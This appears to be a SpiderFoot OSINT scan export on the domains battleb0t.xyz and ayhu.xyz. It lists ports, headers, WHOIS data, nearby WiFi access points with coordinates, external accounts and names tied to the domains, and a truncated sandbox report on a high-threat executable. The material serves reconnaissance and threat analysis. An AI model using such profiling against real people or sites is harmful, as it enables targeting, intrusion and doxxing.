| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | keyubu.com |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.205): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:23 | HTTP Headers | No | Web Spider | 10 | 0 | 4 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} | https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU |
| 2023-05-12 02:54:19 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://www.google-analytics.com/analytics.js | https://fluid.battleb0t.xyz/ |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Vivino (Category: video)
https://www.vivino.com/users/login | login |
| 2023-05-12 02:44:03 | Internet Name | No | SpiderFoot UI | 193 | 0 | 0 | 0 | None | battleb0t.xyz | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 03:27:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.138:443 | 188.114.96.0/24 |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | jQuery CDN | pics.battleb0t.xyz |
| 2023-05-12 03:21:07 | Malicious IP on Same Subnet | Yes | Emerging Threats | 0 | 0 | 4 | 0 | None | emergingthreats.net [207.154.224.0/20]
https://rules.emergingthreats.net/blockrules/compromised-ips.txt | 207.154.224.0/20 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom71CC68 (Net ID: 00:0C:F6:71:CC:68) | 50.8897, 6.0563 |
| 2023-05-12 02:53:39 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 185.199.108.153 |
| 2023-05-12 03:00:16 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | mail.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:09:02 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.99 | 87.248.157.102 |
| 2023-05-12 02:54:23 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H04DT6EFGA302FBVMKFT2XD1"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 2600:1f18:2489:8201::c8 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=nwapi.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 4 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6036feab195d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="xHEPK.9yJ4uMnlaQxqQ03K5Csvr7WqmdHv5Obe9KwF8-1683860053-0-AVLFWFwz5cW9coePC-vcYYHeZXoVyZvPTnO5FSb69_py4IiBnIT69jsbDrQcjp17Zdx1pnQSJS5VK5u2qIZwYpKNdgBE5WortG78wVuw6xpL5WYKY8Pci1GRr-7IBheF2wnVhBXoAAbVv_kvF_G81MlD02OBybPgpztHUD8TsNxjUjxn5wbC4eO6XMoHSPC4tPjeAbdNC_mEhVDvKltWOjEKs7cQGG73dOqgzgZ5u0yyPTVVyh672vGUJchUE-7DlMtIc30cGk9vDedhhqnCEm6pQHqEqKn7E1c0_xe56xpqCOyx0gVIxxZL8ZolJaAY4W4DtMmEP6W2tHpS_rYvBDI9fm43yWOoTbxEvpOBUd21ETXlvv9NENQqsCUvjbm4kjTEkCkt9i7ao6sYMKBDIKOrBrqKSvX_CT_w9eydgmcnRxeGAnGPZ1UUlMCuPuHg11UNYHIqPBTtKLbqJ0CVo0se3b48fGi-sK8cLCpgZLWb2fRokqIeBAyscADBAfixig610ec8NyTnlho4fWsEuVJ8IH0YuFSDI5qB-p_hHDFAgQ4e2o5glLWVxkylixix8LPq3AjtUqJZW7z32u6RcNlBfPCJCrP_P-wzAtCmBv9wwLgJM8s28Fc0U3NqhEI7UzCd5r2rd1L9dZdXgwaESjOHBhuzibRb747KWauMhNoTHcDBBW-Cplvyyky4fhJh4codwoIMSFuB2e8vqSriOeMyuMhff86CdrTUwmJ-MpOwS5b3SzLp4WsUmqgXo5R_Ptn_13EQTYvgg_fn9wQYMVvNul0EzUw-m0dzAaXiayW9ZQRIKrGrxHaH77vlgDYfon_mV1EHNo0mYKenjF4lATYUDXOdsHJGDEb-aoyHMedXT2xjfifF75YrCt7aKEBajKaabeBOm93QKGtGLkUbhjuxR1Cv3fMl-a8Mcq-sqIzDY7Ofms_NojFVCky1MxilEB-pECoh_3dTQi7RdzrUTwf2cZR9T8D8U2K3Gvk8riLAICiz8kZstCExyU1gQxK_8IKsvToQ9RDrd9y9LVAX9qYv3TfadD1EkNEsFVChUuXBIn1vLV2P2GOPSzKbMN6zXhMlaXjRniTwtw6d8mrDXwAGH5ieemrcUb3FjxXespiPiaHaem6NlgnFXh6fqC6miAGPTygfZ8E84F8EVSFKovIkpjZZLkzg9smKqoObMwmWAc8hXyTmDTP1LoHTnasWw3kR_c4rubMdm-bM_qzcdotudBYUrTeL52K6MUKh8U0LXxV1ssRlYQtn51j2ZPTCT_4njX0UJZi7Aqe8bZOIi6YaJ6JVsLLVQlGwMIkxweehKTweGkzepoKrlA3vvzsnIuw6hwdTbMC1ff1nqZDuEXn1iUtY0QVWk3AiHWDwvflyRUhJFVQ_1RWCY6QxNbtBWuOs4Gsp4MKA65Y2bcGJNUQ61JSZsl8YoM493x6bgQq2c1ARXqI8Z_BprKNhAkkBaHzNAZnBx2sKG-aiygeREJS_Y-EXoEZkRsbQX02jydwcJZ3mjFQKdYrYE5cpUbTynwFh1r8orCm-Lgkh_khmNL7q7VDaHkkpQxyvlai7E7fXqkM8fGYOO32gd0hDiIlm85y2e8PdcZwTHglcg5WuEl3dz67kdyLqQrK_w0NhcEVoQlt-w-zjK_ug7gJVFCqVZy6o3CJv3Lkws4Pg2ePLly9U4qZNVRt3zz5hcKoCs-Pa1ZZzJ_Qzb2gSMP3u4cNDexag1H59HlUfcR7rjMJpsPYzqNpSQW3aa4RjeYciW4G4IbxfKJhCeUuFM4E4frBI_2OUYka-3R16-e5B-3ARb0HzAH7oGbA0ldmTnvfk1irgRMe8Dly0jpz5UNRE52UktWtSquB5QC1854VbxxgX4hhaW-nxmTCdOLafGYF1vg8rF-8NC1_FbTKMqIVsNKBWX0k0kJqiJjLCwjxEgXQ0Ze8manGpGGX8Y1qPfnNzHc2wFXLAoenNI_c9mp5k_TulxRQaJau67nLCYZqdFCfQ3OMpvtX4xDex5PrZ9T6mJUZ1nmSTAUixBLPwpRedqy1s01H2wlDBkSOhsj3ve3tA6H7ilQqtLQdfAuHK0_eW1Lnq3yDEyuzONZ1kc6hBMbhcyIePtyej1WeNa25rCw6imHPfgLzKSCX7sag3MiyXZyiVPtZsVrR333h3qptvAltAf6opML25pqpe_uKUHyc688RAlp_EgHCq-Gbx-iN5q2hY5Ny4xRPFJdCIjbFhNtGVw4MmWaJvAiePWPHqtweVVadLDMPlJCf3alqy71aqsxQI2WCWYRD_4Slgey6lOkSSsS-VG0B1_pBFsI7Qoqg4mLVGYQxVgLA66wEWyPhSdzuYryBNRXVwsWkB269be5JcqZIZNgC1b12-boaqHNSrCKMj83nOOm100RSF9-42ajHgNdPc9977LoOsIdA4wiwXyaum_ok5aRH8NPa5DUgCLteaEnABaI691YwS3Yv94Jp3MSd41yoh45wgGe42SPtQxw">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '8897',
cRay: '7c5f6036feab195d',
cHash: '461a186bf737deb',
cUPMDTk: "\/?__cf_chl_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '2ToLICUBPb7XpOOLU5MHBc4J5yG0oheUGtehN/w3ZVsFmzDAbOvCroJJwwrRkjNV6Tn52KN/9nB7B8sz2NSv9/9dxRAmoEg1HGzmozU2NACMuujm6XlVF5ozcbqn9ZBfwSat/mPFIuXurAISwgnINkk9AtugcpCUQHziQl+hs46Tkaidb6rhmNGYloX58NMp6/dt44yfsmywuLVXcAFkah1saaFWiETNA22oPOLsKwdZLjZF/57cZ6U7IE+U9u08hSy2LwMl1S56XHXIPlPdXyU5wEzETE40l9LPy3liHtZ+0sFpGwOEjIvxrQ5T+yTbOd6FLXQq2biCWHdXzGq4q/Z6wpMSuxwTK5+LQiEDYzatOhFmeim8d5on6i6XRRqVjrZwVw7DnLXOPTyWGBSUGsicd01O/2CEnxT4kImRgcQduMx6bhGCiOWw7czbee4tF0zlsS59dzRB//Ht7dvKhDA88UnMm0xLzbHkJ9p9hx93IVifAjtUzWhW/2Y09mfOKl8wDJzjQdRxKsjlPBcyuT+2r0jZJkNDjSBjms0IuC9kDZ1UDHsrKoZzpFM/Of20',
t: 'MTY4Mzg2MDA1My41OTUwMDA=',
m: '5/J7gGK8XmEBWkArTjJaJQpVmCj5kenNaxHbI91xZvc=',
i1: 'd1xtl4gFAsGt/e5zgSdIvg==',
i2: 'L38k4kp9xxsqGxDFehGWAg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6036feab195d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6036feab195d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Germany | Frankfurt am Main, Hesse, 60313, Germany, Europe |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:8080 | 87.248.157.102 |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Netlify | pics.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | iz-wpa (Net ID: 00:01:8E:1A:64:A6) | 37.780462,-122.390564 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XFINITY (Net ID: 00:0D:67:37:7A:79) | 39.0469, -77.4903 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | Domains By Proxy, LLC | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CCAZ (Net ID: 00:02:6F:EA:D0:4E) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Mmorpg (Category: gaming)
https://forums.mmorpg.com/profile/login | login |
| 2023-05-12 03:00:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.46): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | YOSEMITE (Net ID: 00:03:52:A1:3D:41) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:53:00 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | oldfluid.battleb0t.xyz |
| 2023-05-12 02:49:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': u'Windows Gui', u'classification_tags': [u'windows-server-utility'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': 1, u'submit_name': u'popgui.exe', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-176', u'name': u'Calls an API typically used to retrieve function address', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"popgui.exe" called "GetProcAddress" with a parameter FlsGetValue (UID: 00000000-00005448)\n "popgui.exe" called "GetProcAddress" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005448)\n "popgui.exe" called "GetProcAddress" with a parameter FlsAlloc (UID: 00000000-00005448)\n "popgui.exe" called "GetProcAddress" with a parameter FlsSetValue (UID: 00000000-00005448)\n "popgui.exe" called "GetProcAddress" with a parameter LCMapStringEx (UID: 00000000-00005448)\n "popgui.exe" called "GetProcAddress" with a parameter FlsFree (UID: 00000000-00005448)\n "popgui.exe" called "GetProcAddress" with a parameter InitOnceExecuteOnce (UID: 00000000-00005448)\n "popgui.exe" called "GetProcAddress" with a parameter CreateEventExW (UID: 00000000-00005448)\n "popgui.exe" called "GetProcAddress" with a parameter CreateSemaphoreW (UID: 00000000-00005448)\n "popgui.exe" called "GetProcAddress" with a parameter CreateSemaphoreExW (UID: 00000000-00005448)\n "popgui.exe" called "GetProcAddress" with a parameter CreateThreadpoolTimer (UID: 00000000-00005448)\n "popgui.exe" called "GetProcAddress" with a parameter SetThreadpoolTimer (UID: 00000000-00005448)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"popgui.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 752a0000\n "popgui.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 752a0000\n "popgui.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 752a0000\n "popgui.exe" loaded module "KERNEL32" at base 749c0000\n "popgui.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base 6f980000\n "popgui.exe" loaded module "COMCTL32.DLL" at base 6f1e0000\n "popgui.exe" loaded module "%WINDIR%\\SYSTEM32\\NAPINSP.DLL" at base 6fb10000\n "popgui.exe" loaded module "RPCRT4.DLL" at base 74330000\n "popgui.exe" loaded module "%WINDIR%\\SYSTEM32\\PNRPNSP.DLL" at base 6faf0000\n "popgui.exe" loaded module "%WINDIR%\\SYSTEM32\\NLAAPI.DLL" at base 6fad0000\n "popgui.exe" loaded module "%WINDIR%\\SYSTEM32\\MSWSOCK.DLL" at base 6fc90000\n "popgui.exe" loaded module "%WINDIR%\\SYSTEM32\\WINRNR.DLL" at base 6fac0000\n "popgui.exe" loaded module "%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL" at base 6fba0000\n "popgui.exe" loaded module "%WINDIR%\\SYSTEM32\\RASADHLP.DLL" at base 6fdb0000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-175', u'name': u'Calls an API typically used to load libraries', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"popgui.exe" called "LoadLibrary" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005448)\n "popgui.exe" called "LoadLibrary" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005448)\n "popgui.exe" called "LoadLibrary" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005448)\n "popgui.exe" called "LoadLibrary" with a parameter kernel32 (UID: 00000000-00005448)\n "popgui.exe" called "LoadLibrary" with a parameter comctl32.dll (UID: 00000000-00005448)\n "popgui.exe" called "LoadLibrary" with a parameter %PROGRAMFILES(X86)%\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\office.odf (UID: 00000000-00005448)\n "popgui.exe" called "LoadLibrary" with a parameter Comctl32.dll (UID: 00000000-00005448)\n "popgui.exe" called "LoadLibrary" with a parameter %PROGRAMFILES(X86)%\\MICROS~1\\Office14\\1033\\GrooveIntlResource.dll (UID: 00000000-00005448)'}, {u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-10', u'name': u'Loads the RPC (Remote Procedure Call) module DLL', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"popgui.exe" loaded module "%WINDIR%\\SysWOW64\\rpcrt4.dll" at 74330000'}, {u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-9', u'name': u'Loads the cryptographic module DLL', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1027', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-267', u'attck_id': u'T1027', u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"popgui.exe" loaded module "%WINDIR%\\SysWOW64\\bcryptprimitives.dll" at 763D0000'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:iconcache_wide.db!dfMaintainer"\n "Local\\SM0:5448:168:WilStaging_02"\n "SM0:5448:64:WilError_01"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:iconcache_custom_stream.db!dfMaintainer"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1920.db!dfMaintainer"\n "Local\\SM0:5448:64:WilError_01"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:iconcache_exif.db!dfMaintainer"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_768.db!dfMaintainer"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_48.db!dfMaintainer"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1280.db!dfMaintainer"\n "Shell.CMruPidlList"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:iconcache_96.db!dfMaintainer"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_exif.db!dfMaintainer"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:iconcache_2560.db!dfMaintainer"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_16.db!dfMaintainer"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:iconcache_256.db!dfMaintainer"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:iconcache_idx.db!rwWriterMutex"\n "Global\\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:iconcache_idx.db!IconCacheInit"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1546/015', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1546.015', u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"popgui.exe" touched "Computer" (Path: 